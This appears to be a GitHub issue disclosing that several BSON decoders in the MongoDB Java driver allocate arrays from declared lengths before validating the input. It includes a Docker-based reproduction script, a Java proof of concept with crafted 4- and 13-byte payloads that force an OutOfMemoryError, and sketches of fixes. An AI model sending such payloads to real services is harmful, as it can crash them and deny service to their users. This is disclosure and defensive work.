BSON decoders allocate declared lengths before validating available bytes #2007

Description

@Str1ckl4nd

Summary

Some BSON decoding paths allocate byte arrays directly from declared BSON lengths before checking whether the input contains enough bytes to satisfy that declaration.

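This can turn a very small malformed BSON input into a large allocation and an OutOfMemoryError, rather than a controlled BSON parse rejection. In the reproduction below, a 4-byte stream and a 13-byte document are each enough to request an array of 2,147,483,647 bytes.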

The paths I observed are:

  • BsonBinaryReader.doReadBinaryData()
  • BasicBSONDecoder.readObject(InputStream)
  • LazyBSONDecoder.readObject(InputStream)

Code paths

For binary fields, BsonBinaryReader.doReadBinaryData() reads the binary length, allocates new byte[numBytes], and then reads into that array:

protected BsonBinary doReadBinaryData() {
    int numBytes = readSize();
    byte type = bsonInput.readByte();
    ...
    byte[] bytes = new byte[numBytes];
    bsonInput.readBytes(bytes);
    return new BsonBinary(type, bytes);
}

Reference:

https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/BsonBinaryReader.java#L134-L147
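
To illustrate the kind of check that is missing here, the following is a minimal standalone sketch, not driver code. It uses java.nio.ByteBuffer in place of the driver's input abstraction, and the class name BinaryLengthCheck, the method readBinaryPayload, and the choice of IllegalArgumentException are all assumptions made for the example. The point is only the ordering: compare the declared length with the bytes that remain, then allocate.

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

// Hypothetical helper for illustration; not part of the driver.
final class BinaryLengthCheck {

    /**
     * Reads a BSON binary value (int32 length, subtype byte, payload) from the
     * buffer's current position. A declared length that the remaining input
     * cannot satisfy is rejected before any array is allocated.
     */
    static byte[] readBinaryPayload(final ByteBuffer input) {
        input.order(ByteOrder.LITTLE_ENDIAN); // BSON integers are little-endian
        if (input.remaining() < 5) {
            throw new IllegalArgumentException("Truncated binary header");
        }
        int numBytes = input.getInt();
        input.get(); // subtype byte, not needed for this sketch

        // Validate against what is actually available, then allocate.
        if (numBytes < 0 || numBytes > input.remaining()) {
            throw new IllegalArgumentException("Declared binary length " + numBytes
                    + " exceeds the " + input.remaining() + " bytes remaining");
        }
        byte[] bytes = new byte[numBytes];
        input.get(bytes);
        return bytes;
    }
}
```

With the binary header from the reproduction payload (length ff ff ff 7f followed by a subtype byte and a terminator), this sketch throws immediately instead of requesting a 2 GiB array.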

For stream decoding, BasicBSONDecoder.readFully(...) reads the first four bytes as the document size and immediately allocates that size:

private byte[] readFully(final InputStream input) throws IOException {
    byte[] sizeBytes = new byte[4];
    Bits.readFully(input, sizeBytes);
    int size = Bits.readInt(sizeBytes);

    byte[] buffer = new byte[size];
    System.arraycopy(sizeBytes, 0, buffer, 0, 4);
    Bits.readFully(input, buffer, 4, size - 4);
    return buffer;
}

Reference:

https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/BasicBSONDecoder.java#L100-L108

LazyBSONDecoder.decode(InputStream, BSONCallback), which LazyBSONDecoder.readObject(InputStream) calls, has the same allocation-before-body-read shape:

byte[] documentSizeBuffer = new byte[BYTES_IN_INTEGER];
int documentSize = Bits.readInt(in, documentSizeBuffer);
byte[] documentBytes = Arrays.copyOf(documentSizeBuffer, documentSize);
Bits.readFully(in, documentBytes, BYTES_IN_INTEGER, documentSize - BYTES_IN_INTEGER);

Reference:

https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/LazyBSONDecoder.java#L54-L58

Expected behavior

Malformed BSON with impossible or unavailable declared lengths should fail with a controlled BSON parse exception before allocating an array of the declared size.

Actual behavior

A compact input can cause OutOfMemoryError before the parser rejects the malformed body.
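
To make the size mismatch concrete, here is a small sketch that decodes the four-byte length prefix used in the reproduction below. The class and method names are hypothetical; only the byte values come from the PoC.

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

// Hypothetical demo class; the bytes match streamLengthOnly in the PoC.
final class DeclaredLengthDemo {

    /** Decodes a BSON int32 length prefix, which is stored little-endian. */
    static int declaredLength(final byte[] prefix) {
        return ByteBuffer.wrap(prefix).order(ByteOrder.LITTLE_ENDIAN).getInt();
    }

    public static void main(final String[] args) {
        byte[] streamLengthOnly = {(byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f};
        int declared = declaredLength(streamLengthOnly);
        // prints "2147483647 bytes declared, 4 bytes supplied"
        System.out.println(declared + " bytes declared, "
                + streamLengthOnly.length + " bytes supplied");
    }
}
```

The declared length is Integer.MAX_VALUE, so the decoders attempt to allocate roughly 2 GiB on the strength of four input bytes.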

Reproduction

Prerequisites

  • Docker
  • Network access to clone this repository
  • Network access for Gradle dependency resolution

File: repro.sh

#!/usr/bin/env bash
set -euo pipefail

REPO_URL="${REPO_URL:-https://github.com/mongodb/mongo-java-driver.git}"
TARGET_REF="${TARGET_REF:-8aa32421452e77e1c33f3ee79a2be76067a6377b}"
WORKDIR="$(mktemp -d)"

cleanup() {
  rm -rf "$WORKDIR"
}
trap cleanup EXIT

CHECKOUT="$WORKDIR/mongo-java-driver"
REPRO_DIR="$WORKDIR/repro"

git clone --filter=blob:none "$REPO_URL" "$CHECKOUT"
git -C "$CHECKOUT" checkout --detach "$TARGET_REF"

mkdir -p "$REPRO_DIR"

cat > "$REPRO_DIR/Dockerfile" <<'EOF'
FROM eclipse-temurin:17-jdk

RUN apt-get update \
    && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends bash ca-certificates \
    && rm -rf /var/lib/apt/lists/*

WORKDIR /repro
COPY BsonDeclaredLengthAllocationPoc.java verify.sh ./
RUN chmod +x /repro/verify.sh

ENTRYPOINT ["/repro/verify.sh"]
EOF

cat > "$REPRO_DIR/BsonDeclaredLengthAllocationPoc.java" <<'EOF'
import org.bson.BasicBSONDecoder;
import org.bson.LazyBSONDecoder;
import org.bson.RawBsonDocument;
import org.bson.codecs.BsonDocumentCodec;

import java.io.ByteArrayInputStream;

public final class BsonDeclaredLengthAllocationPoc {
    public static void main(final String[] args) throws Exception {
        byte[] binaryLengthPayload = new byte[] {
                0x0d, 0x00, 0x00, 0x00,
                0x05, 0x62, 0x00,
                (byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f,
                0x00,
                0x00
        };

        byte[] streamLengthOnly = new byte[] {
                (byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f
        };

        expectOutOfMemory("nested binary declared length", () ->
                new RawBsonDocument(binaryLengthPayload).decode(new BsonDocumentCodec()));

        expectOutOfMemory("BasicBSONDecoder stream declared length", () ->
                new BasicBSONDecoder().readObject(new ByteArrayInputStream(streamLengthOnly)));

        expectOutOfMemory("LazyBSONDecoder stream declared length", () ->
                new LazyBSONDecoder().readObject(new ByteArrayInputStream(streamLengthOnly)));

        System.out.println("SUCCESS: declared lengths caused allocation failure before controlled rejection");
    }

    private static void expectOutOfMemory(final String label, final ThrowingRunnable action) throws Exception {
        try {
            action.run();
            throw new IllegalStateException("Expected OutOfMemoryError for " + label);
        } catch (OutOfMemoryError expected) {
            System.out.println("OOM " + label + ": " + expected.getClass().getSimpleName()
                    + " " + expected.getMessage());
        }
    }

    private interface ThrowingRunnable {
        void run() throws Exception;
    }
}
EOF

cat > "$REPRO_DIR/verify.sh" <<'EOF'
#!/usr/bin/env bash
set -euo pipefail

TARGET_REPO="${TARGET_REPO:-/target-repo}"
WORK_ROOT="/work"
WORK_REPO="$WORK_ROOT/target"
CLASS_DIR="$WORK_ROOT/classes"
OUTPUT_FILE="$WORK_ROOT/output.txt"

rm -rf "$WORK_ROOT"
mkdir -p "$WORK_ROOT" "$CLASS_DIR"
cp -a "$TARGET_REPO" "$WORK_REPO"

cd "$WORK_REPO"
./gradlew --no-daemon :bson:jar -x test > "$WORK_ROOT/gradle-build.log" 2>&1 || {
  cat "$WORK_ROOT/gradle-build.log"
  exit 1
}

jars=("$WORK_REPO"/bson/build/libs/*.jar)
CP="$(IFS=:; echo "${jars[*]}")"

javac -cp "$CP" /repro/BsonDeclaredLengthAllocationPoc.java -d "$CLASS_DIR"
java -Xmx64m -cp "$CP:$CLASS_DIR" BsonDeclaredLengthAllocationPoc > "$OUTPUT_FILE" 2>&1 || {
  cat "$OUTPUT_FILE"
  exit 1
}

cat "$OUTPUT_FILE"

grep -F "OOM nested binary declared length" "$OUTPUT_FILE" >/dev/null
grep -F "OOM BasicBSONDecoder stream declared length" "$OUTPUT_FILE" >/dev/null
grep -F "OOM LazyBSONDecoder stream declared length" "$OUTPUT_FILE" >/dev/null
grep -F "SUCCESS: declared lengths caused allocation failure before controlled rejection" "$OUTPUT_FILE" >/dev/null
EOF

docker build -t mongo-java-driver-bson-declared-length-repro "$REPRO_DIR"
docker run --rm \
  -e TARGET_REPO=/target-repo \
  -v "$CHECKOUT:/target-repo:ro" \
  mongo-java-driver-bson-declared-length-repro

Command

chmod +x repro.sh
./repro.sh

Observed output

OOM nested binary declared length: OutOfMemoryError Requested array size exceeds VM limit
OOM BasicBSONDecoder stream declared length: OutOfMemoryError Requested array size exceeds VM limit
OOM LazyBSONDecoder stream declared length: OutOfMemoryError Requested array size exceeds VM limit
SUCCESS: declared lengths caused allocation failure before controlled rejection

Suggested fix direction

Before allocating arrays from declared BSON lengths, reject lengths that are impossible for the current input or above an appropriate maximum. For stream decoders, this likely means validating the declared document length before allocating the full document buffer.
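
For the stream case, one possible shape is sketched below. It is a standalone illustration, not a proposed patch: BoundedDocumentReader, readDocument, the maxDocumentSize parameter, and the 8 KiB chunk size are all assumptions made for the example. It rejects declared sizes outside a caller-chosen range and then reads the body in bounded chunks, so memory use tracks the bytes actually received rather than the declared length.

```java
import java.io.ByteArrayOutputStream;
import java.io.EOFException;
import java.io.IOException;
import java.io.InputStream;

// Hypothetical helper for illustration; not part of the driver.
final class BoundedDocumentReader {
    private static final int MIN_DOCUMENT_SIZE = 5; // int32 length + terminating 0x00
    private static final int CHUNK_SIZE = 8192;     // assumed chunk size

    static byte[] readDocument(final InputStream input, final int maxDocumentSize)
            throws IOException {
        byte[] sizeBytes = new byte[4];
        readFully(input, sizeBytes);
        int size = (sizeBytes[0] & 0xff)
                | ((sizeBytes[1] & 0xff) << 8)
                | ((sizeBytes[2] & 0xff) << 16)
                | ((sizeBytes[3] & 0xff) << 24);

        // Reject impossible or oversized declarations before allocating anything.
        if (size < MIN_DOCUMENT_SIZE || size > maxDocumentSize) {
            throw new IOException("Invalid declared BSON document size: " + size);
        }

        // Grow the buffer only as body bytes actually arrive.
        ByteArrayOutputStream document = new ByteArrayOutputStream(Math.min(size, CHUNK_SIZE));
        document.write(sizeBytes, 0, sizeBytes.length);
        byte[] chunk = new byte[Math.min(size, CHUNK_SIZE)];
        int remaining = size - sizeBytes.length;
        while (remaining > 0) {
            int read = input.read(chunk, 0, Math.min(remaining, chunk.length));
            if (read < 0) {
                throw new EOFException("Stream ended with " + remaining + " bytes still declared");
            }
            document.write(chunk, 0, read);
            remaining -= read;
        }
        return document.toByteArray();
    }

    private static void readFully(final InputStream input, final byte[] buffer)
            throws IOException {
        int offset = 0;
        while (offset < buffer.length) {
            int read = input.read(buffer, offset, buffer.length - offset);
            if (read < 0) {
                throw new EOFException("Stream ended inside the length prefix");
            }
            offset += read;
        }
    }
}
```

The trade-off is an extra copy in toByteArray() for well-formed documents. A variant could allocate the full array directly once the declared size is below some smaller threshold and fall back to chunked reads above it.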
